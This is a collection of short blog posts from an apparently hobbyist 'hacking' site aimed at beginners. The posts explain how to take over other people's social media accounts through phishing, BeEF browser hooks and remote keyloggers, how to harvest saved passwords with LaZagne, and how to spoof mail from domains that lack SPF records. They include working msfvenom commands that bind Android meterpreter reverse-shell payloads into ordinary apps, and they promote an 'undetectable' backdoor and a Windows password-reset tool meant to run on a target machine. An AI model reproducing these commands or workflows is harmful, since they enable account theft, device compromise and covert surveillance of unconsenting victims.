Posts

Showing posts from March, 2021

Missing spf record

Hey friends how are you hope you are doing well. Today we are discussing about really interesting topic that is missing spf record in simple way how you can send Gmail from website Gmail to anyone. This kind of vulnerabilities are very useful in social engineering. This website are very easy to exploit want to know how to find and exploit this vulnerabilities  do follow the following steps : First you have to check whether website have a Valid SPF record or not . For checking SPF record do visit this website : https://www.dmarcanalyzer.com/spf/checker/ Once you found website with no valid SPF record You have to use any fake mailer service to send Gmail from target website to the victim . And boom you are successfully exploited this vulnerabilitie. If you have any doubts do watch this video : https://youtu.be/BSZGkpAZXaI And also don't forget to follow us on Instagram and GitHub and do like our content on Instagram: https://instagram.com/__pytools__ https://GitHub.com/pytools786

Parameter tampering

  Hey guys how are you hope you are doing well. Today we are discussing about really interesting topic that is Parameter tampering. When you hear about website hacking you might be thinking about how hacker's alter the price of products and many more questions you are might be thinking about. So don't worry I am going to explain you everything pls do read this article completely . As name implies tampering the parameter is called Parameter tampering .   Parameter tampering is a simple attack targeting the application business logic. This attack takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. Attackers can easily modify these parameters to bypass the security mechanisms that rely on them. Want to know how to exploit this vulnerabilitie do watch this video: https://youtu.be/9KmzSk5O8U8 And also don't forget to follow us on Instagram an...

Scanning

Hey friends, how are you today we are going to discuss about scanning so let's get started. After gathering information about target website next step is to scan the website for the vulnerability.  In this article we are Going to scan the website using tool called rapid scan Rapid scan is Multi-Tool Web Vulnerability Scanner. Rapid scan automatically runs multiple tools such as nikto, dnsscan, wafw00f, and fierce against the host. It currently supports 80 vulnerability tests. In this recipe, we will learn the usage of RapidScan to save time and automate vulnerability discovery. This tool is open source and available on GitHub at the link: https://github.com/skavngr/rapidscan After cloning the given tool change the directory at location of tool and then type the following command: python rapidscan.py http://example.com And then hit enter after sometime the tool will list all the Vulnerability. That's all for today's guys and don't forget to follow us on Instagram and Git...

INFORMATION GATHERING

Hey guys how are you today we are going to discuss about information gathering.   Information gathering is the first step of Ethical Hacking, where the penetration tester or even hackers gather information on their target victims. To increase your chances of a “successful” hacking . Back to website hacking, there are three approaches that one can take when planning to perform a hack on a website/web app. These approaches include:- Server-side Attack Client-side Attack Web Application Pen testing . As mentioned earlier, every attack begins with information gathering. There is a couple of information that one can gather during the process. These include but are not limited to: 1] Victim IP addresses 2] Domain Name Information 3] Technologies used by the website/web applications 4] Other websites on the same server DNS records This information could help you perform a successful hack on a website/ web app. In this article, I will be showing you how to use some tools to gather informat...

Hunting down social media accounts with beef-xss

  Hey guys how are you today I am going to tell you another way of hunting social media accounts, that's is by using beef-xss. Want to know what is beef-xss do visit this article: https://pytools786.blogspot.com/2021/03/hack-windows-10-using-link.html This way is pretty much similar as phishing but this way gives us remote control on the browser so we can do lots of cool things with this method and it is less suspicious as compare to phishing because we are going to embed our beef Payload into website. Want to know how to hunt social media accounts using beef-xss pls do watch this video: https://youtu.be/HIYcqZqqpS4 Also don't forget to follow us on Instagram and GitHub and do like our content on Instagram: https://instagram.com/__pytools__ https://GitHub.com/pytools786

Recovering all the saved passwords from target system using lazagne

  Hey friends how are you hope you are doing well. Today I am going to tell you how you can recover all the saved passwords from target system with the help of tool called lazange . The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software Basically lazange is a post exploitation tool, but with the help of simple python script we can used it directly without actually gaining the access over victim. Want to how to used lazange with python script pls do watch this video: https://youtu.be/rAgaIokaufA That's all for today Thx guy's Also don't forget to follow us on Instagram and GitHub and do like our content on Instagram: http://instagram.com/__pytools__ https://github.com/Pytools786/

Hunting social media accounts with phishing

Hey friends how are you, Today I am going to tell you most popular and comman way to hack any social media account. And that is phishing Phishing is a cyber attack that uses disguised email as a weapon. The goal is to trick the email recipient into believing that the message is something they want or need — a request from their bank, for instance, or a note from someone in their company — and to click a link or download an attachment. You can generate your own phishing pages or phishing website with the help of tools like socialfish and SEToolkit. Want to know how to generate phishing pages using socialfish and SEToolkit pls do watch this video's: https://youtu.be/u9dBGWVwMMA https://youtu.be/Jjulz-xHwEo That's all for today's . Thx  Also don't forget to follow us on Instagram and GitHub and do like our content on Instagram: http://instagram.com/__pytools__ https://github.com/Pytools786/

Hunting down social media accounts with remote Keylogger

  Hey friends how are you, hope you are doing well. Today I am going to tell you what is keylogger and how you can spy on anyone with the help of remote Keylogger. Keyloggers are a type of monitoring software designed to record keystrokes made by a user. Keylogger captures the key strike in victim's pc and sends log to the Gmail. And it's really useful in many scenario, when we just want username and password of any user or we just want to spy on the user. So now u must understand what is keylogger Know how to generate your own Keylogger for Windows or Linux  Then pls do watch this video https://youtu.be/oM-kKk5RXeo That's all for today... Thx 

Hacking Android using game or any application

  Hey friends how are you        Today I am going to tell you how you can hack anyone's android phone with game or any other apk you want to hack with it. What really we are going to do is , we are simply binding our malicious apk with other apk and when user clicks on that apk our malicious apk will start working in background and gives us reverse connection. But how you can bind your Payload (malacious apk) with other apks: for this do follow this steps: Their are mainly two ways, using which you can simply bind your Payload with any other apks. 1) By using msf-venom For binding your Payload with msf-venom do type this command in your Linux terminal: msfvenom -x your_apk_filename_/_apk_filepath.apk -p android_payload_name LHOST=your_ip_address LPORT=port_on_which_you_want_to_listen -o path where you want to store output file Overall command looks like: msfvenom -x yourapkfilename.apk -p android/meterpreter/reverse_tcp LHOST=192.168.00.1 LPORT=4444 -o /root/De...

Hacking Android using malacious apk

  Hiiii friends today we are going to talk about really interesting topic that how you can hack anyone android phone using malacious apk. For this you just need Kali-linux and msf-venom. Msf-venom comes preinstall in Kali Linux. Msf-venom is a command line instance of Metasploit that is used to generate and output all of the various types of shell code that are available in Metasploit. To generate Payload using msf-venom you have to open Linux terminal and type the above command- msfvenom -p android/meterpreter/reverse_tcp lhost=<your IP address> lport=<port no on which you want to listen> -f payload.apk > / root/ P = Payload I.e. Windows, Android, PHP etc. In this tutorial we used android payload Lhost = your IP address Lport = any port you wish to assign to the listener F = file extension (i.e. windows=exe, android=apk etc.) Followed by path where you want to store the file As it is android Payload we use .apk extension And after typing this command you just have t...

Hack Windows 10 using link

  Hey friends how are you  Today I am going to tell you really interesting topic that how you can hack Windows 10 via using link.   So let's get started... For this u required kali-linux and beef-xss framework. Beef-xss framework is a browser exploitation framework that hooks the browser into the beef. We are generating payload using beef xss and embed that payload into our webpage.once we embedded beef code into our webpage we are ready to go. Now send our website URL to target and as soon as target click on that link it will hook to beef and we can do anything we want to do with the target. I just use social engineering module in which I used fake notification bar for Chrome and give download URL of my veil-payload as soon as target click on that link payload will download and we will get a reverse meterpreter connection . Note : same method is applied for Linux, Mac and android Just change payload options according to operating system and change its ico and convert P...

How to hack Windows 10 using IMG

Hey friends how are you. T         Today I am gonna tell you how you can hack Windows 10 using IMG, pdf, song ,video or anything you want.        We are not really going to hack Windows by using IMG pdf or anything else we are just embedding our backdoor into an IMG or pdf .        Know how to embed your backdoor into img pdf or anything else do watch this video: Their are mainly two ways to embed your backdoor in IMG or pdf  1) via using binders 2) by using download and execute scrip 1st method is too old and sometimes it won't work. For me this method doesn't go right. Many antivirus program detect our backdoor by this method. So I recommend you 2nd method  For this pls do watch this video:- https://youtu.be/pXE3Qii_yYc After you know how to download any file with bat script you can download an IMG and backdoor or a pdf and keylogger or anything u want. Just make sure you provided direct download URL. And then conve...

Features of my backdoor which i created by using python

Hello friends,    I had created a backdoor using python this backdoor isn't too advance but this backdoor allows you to do lots of cool things. Features of backdoor : 1) perfectly works against any operating system [windows ,Mac, Linux] 2) Fully UnDetectable by antivirus program 3) it also allows you to exexcute any system command and get back result 4) you can also navigate through directories   5) also you can upload files via this feature you can upload a meterpreter shell and get a meterpreter session Source code of backdoor and listener is on GitHub: https://github.com/Pytools786/FUDbackdoor And also friends pls don't forget to follow us on Instagram and GitHub: https://instagram.com/__pytools__ https://github.com/Pytools786 That's all for today, hope you will enjoy our content on Instagram 🙂.

hacking Windows 10 OS

  This article is intended to demonstrate, how to hack Windows machine with help of backdoor . Backdoor is a program that runs on target system will gives a reverse connection to the attacker to connect to the target machine. Once attacker get connected to target machine he can do anything he want with that system. We are going to generate a backdoor using the Veil framework.    You can also generate backdoor using msf-venom but backdoor generated by the msf-venom are more detectable as  compare to veil-evasion . So  it's better to use   veil-evasion.    Veil-Evasion   is a tool used to generate  payloads. To  install the Veil-Framework, you are supposed to configure the latest Python packages into your machine.              The important point to remember is that the installation must be done with superuser privileges. If you are not using the root account (as default with Kali Linux), prepend c...

How to Hack windows10 Password

In this tutorial we are going to hack window current login user password. I had written a simple python script that runs on target system will automatically change current windows user password to hack. You just have to run this script on target system with admin  prevelleges and boom the password will automatically changed to hack Without knowing the current password.  Source code and executable file is on GitHub : https://github.com/Pytools786/passreset Follow us on :  https://instagram.com/__pytools__ Download .exe file and run this file as admin on target system and see the magic.  Exe file link : https://github.com/Pytools786/passreset/blob/main/python%20project/exe%20file/pls2.exe